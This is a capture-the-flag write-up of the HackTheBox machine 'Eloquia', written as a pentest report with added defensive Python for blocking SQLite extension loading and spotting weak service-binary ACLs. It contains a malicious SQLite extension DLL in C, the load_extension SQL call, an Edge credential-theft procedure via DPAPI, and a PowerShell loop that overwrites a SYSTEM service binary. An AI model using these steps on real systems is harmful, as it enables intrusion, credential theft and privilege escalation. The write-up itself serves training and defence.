Overview
- Platform: HackTheBox
- Difficulty: Insane
- IP: 10.129.x.x

Eloquia is a Windows machine featuring two web applications: Eloquia (a blog platform) and Qooqle (a search engine). The attack chain involves SQLite exploitation, browser credential theft, and service binary hijacking.
Scope
| Host | IP Address | Operating System | Role |
|---|---|---|---|
| ELOQUIA | 10.129.x.x | Windows Server 2019 | Web Server |
Executive Summary
The engagement identified critical vulnerabilities:
- SQLite load_extension() enabled, allowing arbitrary DLL loading and RCE
- Browser saved passwords accessible via DPAPI decryption from RCE context
- Insecure file permissions on service binary allowing replacement
- Service runs as SYSTEM enabling privilege escalation via binary hijacking
Risk Rating: Critical
Attack Path Overview
```text
┌──────────────────────────────────────────────────────────────┐
│ SQL Explorer → SQLite load_extension() → RCE as WEB          │
└──────────────────────────────────────────────────────────────┘
                                │
                                ▼
┌──────────────────────────────────────────────────────────────┐
│ Edge Browser Profile → DPAPI Decrypt → Olivia.KAT Creds      │
└──────────────────────────────────────────────────────────────┘
                                │
                                ▼
┌──────────────────────────────────────────────────────────────┐
│ WinRM Access → Service Analysis → Binary Write Permissions   │
└──────────────────────────────────────────────────────────────┘
                                │
                                ▼
┌──────────────────────────────────────────────────────────────┐
│ Replace Failure2Ban.exe → Service Restart → SYSTEM Shell     │
└──────────────────────────────────────────────────────────────┘
```
Phase 1: Enumeration
1.1 Port Scanning
```bash
nmap -sC -sV -p- 10.129.x.x
```
| Port | Service | Version |
|---|---|---|
| 80 | HTTP | Microsoft IIS |
| 5985 | WinRM | Microsoft HTTPAPI httpd 2.0 |
| 47001 | WinRM | Microsoft HTTPAPI httpd 2.0 |
Virtual Hosts Discovered:
- eloquia.htb - Blog platform with Django admin
- qooqle.htb - Search engine with OAuth2
1.2 Web Application Analysis
The Eloquia application exposes a development SQL Explorer at /dev/sql-explorer/play/ that allows executing arbitrary SQL queries against a SQLite database.
Key Finding: SQLite’s load_extension() function is enabled.
Phase 2: Initial Foothold - SQLite RCE
2.1 Attack Vector
SQLite’s load_extension() function can load arbitrary DLLs. The DLL must export a function named sqlite3_<name>_init.
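Because the explorer is a Django view over SQLite, the application-side fix is to give it a connection that can neither reach load_extension() nor write to the database. The following is an added Python example, not code from the Eloquia application or from this write-up; it assumes the explorer runs queries through Python's sqlite3 module, and the blog_post table and its rows are constructed here for illustration. It installs a SQLite authorizer that refuses load_extension() by name and denies every non-read action, and leaves extension loading switched off on the connection.

```python
import sqlite3
from typing import Any, Dict, List

# Constructed sample data standing in for the blog's tables (not the real schema).
SAMPLE_TITLES = ["hello", "world"]


def _read_only_authorizer(action, arg1, arg2, dbname, source):
    """SQLite authorizer: allow plain SELECTs, refuse load_extension() and all writes."""
    if action == sqlite3.SQLITE_FUNCTION:
        # For SQLITE_FUNCTION SQLite passes the function name as the second
        # argument; check both to be safe across bindings.
        name = (arg2 or arg1 or "").lower()
        if name == "load_extension":
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK
    # A read-only explorer needs the statement itself and column reads; nothing else.
    if action in (sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ):
        return sqlite3.SQLITE_OK
    # INSERT/UPDATE/DELETE, DDL, PRAGMA, ATTACH and friends are all denied.
    return sqlite3.SQLITE_DENY


def open_explorer_db(titles: List[str]) -> sqlite3.Connection:
    """Build an in-memory database, then lock it down before handing it to the explorer."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE blog_post (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO blog_post (title) VALUES (?)", [(t,) for t in titles])
    conn.commit()
    # Python leaves extension loading disabled by default; state it explicitly
    # where the build exposes the switch so a later refactor cannot flip it silently.
    if hasattr(conn, "enable_load_extension"):
        conn.enable_load_extension(False)
    conn.set_authorizer(_read_only_authorizer)
    return conn


def run_explorer_query(conn: sqlite3.Connection, sql: str) -> Dict[str, Any]:
    """Run one user-supplied query; denied or failing statements return ok=False."""
    try:
        return {"ok": True, "rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc)}


if __name__ == "__main__":
    db = open_explorer_db(SAMPLE_TITLES)
    for q in (
        "SELECT title FROM blog_post ORDER BY id",
        "SELECT load_extension('C:\\\\anything.dll', 'sqlite3_pwn_init')",
        "DELETE FROM blog_post",
    ):
        print(q, "->", run_explorer_query(db, q))
```

The authorizer runs while SQLite prepares the statement, so a denied load_extension() or DELETE never executes; the third query in the demo fails and the rows survive, which is the property a read-only explorer should guarantee regardless of how the underlying library was compiled.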
2.2 Malicious DLL Creation
```c
#include <windows.h>
#include <stdlib.h>

/* Entry point that SQLite calls from load_extension(); the name must follow
   the sqlite3_<name>_init convention. The command output is written under the
   web root so it can be fetched over HTTP afterwards. */
__declspec(dllexport) int sqlite3_pwn_init(void *db, char **error, void *api) {
    system("whoami > C:\\Web\\Eloquia\\static\\assets\\images\\blog\\output.txt 2>&1");
    return 0;
}

/* Standard DLL entry point; nothing to do here. */
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID p) { return TRUE; }
```
Compile with MinGW:
```bash
x86_64-w64-mingw32-gcc -shared -o pwn.dll payload.c
```
2.3 Exploitation Chain
- Upload the DLL via the article banner feature (file upload)
- Execute `SELECT load_extension('path/to/dll', 'sqlite3_pwn_init')`
- Retrieve the command output from the web-accessible path
Result: RCE as eloquia\web user
Phase 3: Lateral Movement - Browser Credential Theft
3.1 Discovery
The WEB user has a Microsoft Edge browser profile with saved passwords. Since we execute code as WEB, we can decrypt these using DPAPI.
Edge Password Location:
C:\Users\web\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
3.2 DPAPI Decryption
Browser passwords are encrypted with AES-GCM using a key protected by Windows DPAPI. Running as the same user allows decryption:
- Extract the encryption key from the Local State file
- Decrypt the key using CryptUnprotectData (DPAPI)
- Use the decrypted key to decrypt the saved passwords
Credentials Recovered:
URL: http://eloquia.htb/accounts/login/
Username: Olivia.KAT
Password: [REDACTED]
3.3 WinRM Access
```bash
evil-winrm -i eloquia.htb -u Olivia.kat -p '[PASSWORD]'
```
User Flag Retrieved!
Phase 4: Privilege Escalation - Service Binary Hijacking
4.1 Service Discovery
The machine runs a custom Failure2Ban service that monitors failed login attempts and blocks IPs via Windows Firewall.
Service Path:
C:\Program Files\Qooqle IPS Software\Failure2Ban - Prototype\Failure2Ban\bin\Debug\Failure2Ban.exe
4.2 Vulnerability
Olivia.KAT has WRITE permission on the service executable:
```powershell
icacls "...\Failure2Ban.exe"
# ELOQUIA\Olivia.KAT:(I)(RX,W)
```
The service runs as LocalSystem (SYSTEM).
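A defender can catch this class of weakness by reading the same icacls output the write-up relies on and flagging any non-administrative principal that holds a write-capable right on a service binary. The following is an added Python example, not part of the write-up; the icacls output it parses is constructed to mirror the finding above (the ELOQUIA\svc_backup deny entry is invented to show that deny ACEs are skipped), and the set of trusted principals is an assumption to adjust per environment.

```python
import re
from typing import List, Set, Tuple

# Principals expected to hold write access on a service binary (assumption; tune per environment).
TRUSTED_PRINCIPALS = {
    r"NT AUTHORITY\SYSTEM",
    r"BUILTIN\Administrators",
    r"NT SERVICE\TrustedInstaller",
}

# icacls right tokens that let the holder modify, replace, delete or take over a file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DE", "WDAC", "WO"}

# icacls tokens that describe inheritance rather than a right.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# Constructed icacls output modelled on the finding in section 4.2 (not captured from the box).
SAMPLE_PATH = r"C:\Program Files\Qooqle IPS Software\Failure2Ban - Prototype\Failure2Ban\bin\Debug\Failure2Ban.exe"
SAMPLE_OUTPUT = SAMPLE_PATH + r""" NT AUTHORITY\SYSTEM:(I)(F)
                 BUILTIN\Administrators:(I)(F)
                 ELOQUIA\Olivia.KAT:(I)(RX,W)
                 BUILTIN\Users:(I)(RX)
                 ELOQUIA\svc_backup:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(path: str, output: str) -> List[Tuple[str, bool, Set[str]]]:
    """Parse icacls output for `path` into (principal, is_deny, rights) tuples."""
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith("successfully processed"):
            continue
        if line.startswith(path):  # only the first ACE line carries the file name
            line = line[len(path):].strip()
        if ":" not in line:
            continue
        principal, ace = line.split(":", 1)  # principals never contain ':'
        tokens = re.findall(r"\(([^)]*)\)", ace)
        is_deny = "DENY" in tokens
        rights: Set[str] = set()
        for tok in tokens:
            if tok == "DENY" or tok in INHERITANCE_FLAGS:
                continue
            rights.update(r.strip() for r in tok.split(","))
        entries.append((principal.strip(), is_deny, rights))
    return entries


def weak_service_binary_aces(path: str, output: str) -> List[Tuple[str, str]]:
    """Return (principal, granted write rights) for untrusted principals that can alter the binary."""
    findings = []
    for principal, is_deny, rights in parse_icacls(path, output):
        if is_deny or principal in TRUSTED_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            findings.append((principal, ",".join(granted)))
    return findings


if __name__ == "__main__":
    for principal, rights in weak_service_binary_aces(SAMPLE_PATH, SAMPLE_OUTPUT):
        print(f"WEAK ACL: {principal} can modify {SAMPLE_PATH} ({rights})")
```

Feed it `icacls "<ImagePath>"` output for every service whose ImagePath resolves outside protected locations; a hit on a service that runs as LocalSystem is the exact precondition section 4.3 exploits, and the remediation is to strip the write right or move the binary under an Administrators-owned directory.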
4.3 Exploitation
A scheduled cleanup task periodically restarts the Failure2Ban service. During the brief window when the service stops:
- Replace Failure2Ban.exe with the malicious payload
- The service restarts, executing the payload as SYSTEM
```powershell
# Loop to catch the unlock moment: the copy only succeeds while the
# service is stopped and the binary is not locked.
$src = "C:\path\to\payload.exe"
$dst = "C:\...\Failure2Ban.exe"
for ($i = 0; $i -lt 600; $i++) {
    try {
        Copy-Item -Path $src -Destination $dst -Force -ErrorAction Stop
        Write-Host "SUCCESS!"
        break
    } catch {
        Start-Sleep -Milliseconds 50
    }
}
```
4.4 SYSTEM Shell
```text
C:\Windows\system32>whoami
nt authority\system
```
Root Flag Retrieved!
Credentials Summary
| Phase | Account | How obtained | Access gained |
|---|---|---|---|
| 1-2 (Initial Access) | admin | Web app admin | SQL Explorer access |
| 1-2 (Initial Access) | WEB | RCE user | SQLite load_extension |
| 3 (Lateral Movement) | Olivia.KAT | DPAPI decrypted | WinRM access |
| 4 (Privilege Escalation) | SYSTEM | Binary hijack | Full compromise |
Tools Used
- Nmap - Port scanning and service enumeration
- MinGW (x86_64-w64-mingw32-gcc) - Cross-compiling Windows DLLs
- Python - Automated exploitation scripts
- Evil-WinRM - Remote shell access
- Netcat - Reverse shell listener
Key Vulnerabilities
| Vulnerability | Impact | Severity |
|---|---|---|
| SQLite load_extension() enabled | RCE as WEB user | Critical |
| Browser saved passwords accessible | Lateral movement | High |
| Insecure service binary permissions | Privilege escalation to SYSTEM | Critical |